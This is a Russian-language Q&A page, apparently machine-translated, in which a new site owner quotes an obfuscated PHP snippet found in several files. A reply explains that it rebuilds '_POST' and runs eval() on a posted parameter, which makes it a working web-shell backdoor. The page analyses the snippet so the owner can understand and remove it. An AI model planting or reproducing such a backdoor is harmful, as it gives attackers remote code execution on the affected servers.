Intereting Posts

Laravel 5.2 – Auth: отображать собственные сообщения об ошибках Изменение CSS на основе строкового запроса PHP Дата Php / Mysql сохранена как '0000-00-00' PHP- «Определено или вышло» в начале многих файлов? Как обнаружить поддельных пользователей (сканеров) и cURL Zend Framework, передавая переменные для просмотра PHP + Ubuntu Отправить письмо с помощью формы gmail localhost Лучшая практика: импортируйте файл mySQL в PHP; разделенные запросы Laravel Request input () или get () Parse CSV, расположенный на другом сервере с PHP, JavaScript Извлечь подстроку между двумя символами в строке PHP mysql_close (): 5 не является допустимым ресурсом MySQL-Link в C: \ wamp \ www \ Includes \ footer.php в строке 4 Как сохранить значения корреляции между пользователями в базе данных с использованием MySQL и PHP? Вставка информации в таблицу соединений ColdFusion Список параметров PDOStatement :: bindParam data_type

Что делает этот код PHP?

Недавно взял на себя веб-сайт и нашел следующий код в нескольких файлах, считая его злонамеренным:

<?php $qV="stop_"; $s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]); if(isset(${$s20}['q1134e5'])){eval(${$s20}['q1134e5']);} ?>

Любые идеи о том, что он делает?

Кажется: первая строка – _POST; – вторая строка проверяет, является ли _POST действительным, и принимает параметр «q1134e5» из сообщения и выполняет его.

Читайте, почему это опасно http://php.net/manual/en/function.eval.php

Web
Analytics Made Easy - StatCounter